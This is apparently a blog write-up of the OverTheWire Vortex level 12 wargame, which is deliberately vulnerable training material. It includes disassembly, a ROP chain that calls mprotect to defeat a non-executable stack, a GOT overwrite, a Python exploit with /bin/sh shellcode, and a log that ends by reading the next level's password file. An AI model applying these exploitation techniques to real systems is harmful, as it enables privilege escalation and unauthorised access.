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Vortex 12

Continuing the previous post about solving vortex 0-11[1]. I just had some time to solve this one too.

1: solving overthewrite


Exploit this level knowing that the stack is not executable. You must login to vortex.labs.overthewire.org to complete this level..

So we get the binary and we find.

.text:08048620 ; int __cdecl main(int argc, const char **argv, const char **envp)
.text:08048620         public main
.text:08048620 main    proc near                       ; DATA XREF: _start+17o
.text:08048620 argc    = dword ptr  8
.text:08048620 argv    = dword ptr  0Ch
.text:08048620 envp    = dword ptr  10h
.text:08048620         push    ebp
.text:08048621         mov     ebp, esp
.text:08048623         push    esi
.text:08048624         push    ebx
.text:08048625         and     esp, 0FFFFFFF0h
.text:08048628         sub     esp, 20h
.text:0804862B         mov     dword ptr [esp+0Ch], 0  ; arg
.text:08048633         mov     dword ptr [esp+8], offset safecode ; start_routine
.text:0804863B         mov     dword ptr [esp+4], 0    ; attr
.text:08048643         lea     eax, [esp+1Ch]
.text:08048647         mov     [esp], eax              ; newthread
.text:0804864A         call    _pthread_create
.text:0804864F         call    _getgid
.text:08048654         mov     esi, eax
.text:08048656         call    _getgid
.text:0804865B         mov     ebx, eax
.text:0804865D         call    _getgid
.text:08048662         mov     [esp+0Ch], esi
.text:08048666         mov     [esp+8], ebx
.text:0804866A         mov     [esp+4], eax
.text:0804866E         mov     dword ptr [esp], 0AAh   ; sysno
.text:08048675         call    _syscall
.text:0804867A         call    _getuid
.text:0804867F         mov     esi, eax
.text:08048681         call    _getuid
.text:08048686         mov     ebx, eax
.text:08048688         call    _getuid
.text:0804868D         mov     [esp+0Ch], esi
.text:08048691         mov     [esp+8], ebx
.text:08048695         mov     [esp+4], eax
.text:08048699         mov     dword ptr [esp], 0A4h   ; sysno
.text:080486A0         call    _syscall
.text:080486A5         mov     eax, [ebp+argv]
.text:080486A8         add     eax, 4
.text:080486AB         mov     eax, [eax]
.text:080486AD         mov     [esp], eax              ; src
.text:080486B0         call    unsafecode
.text:080486B5         mov     eax, 0
.text:080486BA         lea     esp, [ebp-8]
.text:080486BD         pop     ebx
.text:080486BE         pop     esi
.text:080486BF         pop     ebp
.text:080486C0         retn
.text:080486C0 main    endp

This creates a thread running safecode(), then setresgid, setresuid, and runs the unsafecode(). Safecode loops for ever, prints, flush stdout, sleeps, and runs in a level13 priv. Unsafecode is a bufferover flow function, and runs in level12. So we want level13 thus we target the second thread, but we have a problem here. That stack is not executable which will complicate things. So we search for a ROP. We target libc.so.6 in vortex box. Since I don't have access to procfs it will be a little different to find libc. We dbg vortex12 break at __libc_start_main then libc base is the address in debugger minus the offset we find objdump ... | grep libc_start_main... Anyway we dump a list of rop gadgets and start searching and we find a bunch of useful ones. First what I'm trying to do using ROP is the following :

Let's talk a little bit more about how this is going to happen. So we need to set up sys_mprotect by using ebx,ecx,edx registers. So we need to find gadgets that can for example pop ebx, pop edx. I couldn't find something that pops ecx, or xchg ecx,r32 so I had to do some magic to set it to 4096. ebx points to the controlled_stack&~(4096-1) but that will let it contain zeros, so we need to do controlled_stack&~(4096) and then find a gadget that dec ebx to set it to correct value otherwise mprotect will fail with -EINVAL. For edx I found a gadget that zeros it then inc it until it becomes 0x07 which is PROT_{READ|WRITE|EXEC}. Finally we use a gadget that does int 0x80 then we have our executable stack. After that we jump to the executable stack execution (still in thread_1) a code that sets fflush@got to a place in this new executable stack so thread 2 goes there. Then after overwriting fflush@got we loop thread 1 forever ^^/ just to be nice. At this point thread 2 will jump there and execute our shellcode and everyone is happy.

Here's the code that sets fflush@got

global main
        mov eax, 0x0804a004
        mov ebx, 0xffffd330
        mov [eax], ebx
        jmp loop_for_ever

and the exploit

#!/usr/bin/env python2
import sys
from struct import pack

def zero_eax():
        return pack('<I', 0xf7e42e30) # xor eax, eax ; ret
def set_eax_inc(val):
        p = ""
        for i in range(0,val): p += pack('<I', 0xf7e182ac) # inc eax ; ret
        return p

stack = 0xffffd8f5 & ~(4096-1) # 0xffffd000 <- shit we can use
set_fflush = "\xb8\x04\xa0\x04\x08\xbb\x30\xd3\xff\xff\x89\x18\xeb\xfe"
sh = "\x90\x31\xc9\xf7\xe1\xb0\x0b\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
payload = "\x90"*(900-len(sh))+sh
libc_base = 0xf7e10000

p = payload+"\x90"*(1036-len(set_fflush)-len(payload))+set_fflush
p += pack('<I', libc_base+0x000192ee) # pop ebx; ret
p += pack('<I', stack+1) #ebx
p += pack('<I', libc_base+0x00172f2e) # dec ebx
p += pack('<I', libc_base+0x0002d619) # ...
for i in range(0, 186): p += pack('<I', libc_base+0x0016daf8) # inc ecx
p += pack('<I', libc_base+0x00083c95) #: xor edx, edx; mov eax, edx; ret)
p += pack('<I', libc_base+0x00134287) # inc edx; ret
p += pack('<I', libc_base+0x00134287) # inc edx; ret
p += pack('<I', libc_base+0x00134287) # inc edx; ret
p += pack('<I', libc_base+0x00134287) # inc edx; ret
p += pack('<I', libc_base+0x00134287) # inc edx; ret
p += pack('<I', libc_base+0x00134287) # inc edx; ret
p += pack('<I', libc_base+0x00134287) # inc edx; ret

p += zero_eax()
p += set_eax_inc(125)
p += pack('<I', libc_base+0x000ef951) # beter int
p += pack('<I', 0xffffd340)*10

print p

You can clean up the code a lil bit it contains some useless stuff from some expirements. Anyway...

vortex12@melinda:XXX$ ./v "$(python happy_clowns.py)"
$ id
uid=5012(vortex12) gid=5012(vortex12) euid=5013(vortex13) groups=5013(vortex13),5012(vortex12)
$ cat /etc/vortex_pass/vortex13